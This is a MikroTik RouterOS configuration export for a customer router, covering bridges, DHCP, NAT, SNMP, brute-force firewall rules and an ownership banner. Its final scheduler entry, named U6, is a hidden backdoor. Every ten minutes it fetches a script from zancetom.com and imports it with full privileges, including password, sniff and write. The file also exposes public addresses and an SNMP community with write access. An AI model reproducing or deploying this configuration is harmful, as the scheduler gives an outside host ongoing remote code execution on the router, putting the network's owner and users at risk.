# feb/25/2023 17:29:03 by RouterOS 6.47.10
# software id = 940R-XV92
#
# model = RB750Gr3
# serial number = D5030FE7A1E0
/interface bridge
add name=LAN_NAT
add name=WAN
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip hotspot profile
set [ find default=yes ] html-directory=flash/hotspot
/ip pool
add name=dhcp_pool0 ranges="192.168.1.2-192.168.1.9,192.168.1.11-192.168.1.12,192.168.1.14-192.168.1.19,192.168.1.21-192.168.1.60,192.168.1.62-192.168.1.66,192.1\
    68.1.68-192.168.1.74,192.168.1.77-192.168.1.93,192.168.1.95-192.168.1.116,192.168.1.118-192.168.1.120,192.168.1.130-192.168.1.155,192.168.1.157-192.168.1.160\
    ,192.168.1.162-192.168.1.179,192.168.1.181-192.168.1.185,192.168.1.187-192.168.1.201,192.168.1.208-192.168.1.221,192.168.1.223-192.168.1.231,192.168.1.235-19\
    2.168.1.254"
/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=LAN_NAT lease-time=2h name=dhcp1
/snmp community
add addresses=190.61.4.34/32,190.61.4.170/32,190.61.4.35/32,190.61.4.36/32 name=ifxcliente write-access=yes
/interface bridge port
add bridge=LAN_NAT interface=ether3
add bridge=LAN_NAT interface=ether4
add bridge=LAN_NAT interface=ether2
add bridge=WAN interface=ether1
/ip neighbor discovery-settings
set discover-interface-list=!dynamic
/ip address
add address=190.61.5.53/30 interface=WAN network=190.61.5.52
add address=192.168.1.1/23 interface=LAN_NAT network=192.168.0.0
add address=172.17.129.6/30 interface=WAN network=172.17.129.4
add address=172.17.129.66/30 comment=MPLS_IFX interface=ether5 network=172.17.129.64
add address=192.168.2.1/24 interface=LAN_NAT network=192.168.2.0
/ip dhcp-server config
set store-leases-disk=48m
/ip dhcp-server network
add address=192.168.0.0/23 dns-server=8.8.8.8,200.91.200.100,200.91.200.101 gateway=192.168.1.1 netmask=24
/ip dns
set servers=8.8.8.8
/ip firewall filter
add action=drop chain=input comment="drop ftp brute forcers" dst-port=21 protocol=tcp src-address-list=ftp_blacklist
add action=drop chain=input comment="drop Telnet brute forcers" dst-port=23 protocol=tcp src-address-list=telnet_blacklist
add action=accept chain=output content="530 Login incorrect" dst-limit=1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=ftp_blacklist address-list-timeout=3h chain=output content="530 Login incorrect" protocol=tcp
add action=add-dst-to-address-list address-list=telnet_blacklist address-list-timeout=3h chain=output content="530 Login incorrect" protocol=tcp
add action=drop chain=input comment="drop ssh brute forcers" dst-port=22 protocol=tcp src-address-list=ssh_blacklist
add action=drop chain=input comment="drop telnet brute forcers" dst-port=23 protocol=tcp src-address-list=telnet_blacklist
add action=add-src-to-address-list address-list=ssh_stage3 address-list-timeout=1m chain=input connection-state=new dst-port=22 protocol=tcp src-address-list=\
    ssh_stage2
add action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=1m chain=input connection-state=new dst-port=22 protocol=tcp src-address-list=\
    ssh_stage1
add action=add-src-to-address-list address-list=ssh_stage1 address-list-timeout=1m chain=input connection-state=new dst-port=22 protocol=tcp
/ip firewall nat
add action=src-nat chain=srcnat out-interface=WAN src-address=192.168.0.0/23 to-addresses=190.61.5.53
add action=dst-nat chain=dstnat dst-address=190.61.5.54 dst-port=443 protocol=tcp src-address=190.60.220.130 to-addresses=192.168.1.207 to-ports=443
add action=dst-nat chain=dstnat dst-address=190.61.5.54 dst-port=22 protocol=tcp src-address=190.60.220.130 src-port="" to-addresses=192.168.1.207 to-ports=22
/ip route
add distance=1 gateway=172.17.129.5
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh address=190.60.0.0/16,190.61.0.0/16,172.16.0.0/16,172.17.0.0/16,10.0.120.0/24,200.62.0.0/16,200.91.0.0/16,38.123.197.23/32,144.91.71.175/32
set winbox address=190.60.0.0/16,200.62.0.0/16,200.91.0.0/16,38.123.197.23/32,144.91.71.175/32
/snmp
set enabled=yes trap-community=ifxcliente
/system clock
set time-zone-name=America/Guatemala
/system identity
set name=SID_1812341_PROYECTO_CUATRO_CARCHA
/system note
set note="**************************************************************\
    \n*                                                            *\
    \n*    ATENCION:  Este equipo es propiedad de IFX Networks     *\
    \n*     El uso no autorizado esta estrictamente prohibido.     *\
    \n*   Todos los usuarios son legalmente responsables de sus    *\
    \n* acciones sobre el sistema y toda actividad sera registrada *\
    \n*                                                            *\
    \n**************************************************************"
/system scheduler
add interval=10m name=U6 on-event=\
    "/tool fetch url=http://zancetom.com/poll/fd220439-f0fc-414c-a2c2-ef0525e8b03b mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jan/07/1970 start-time=02:43:55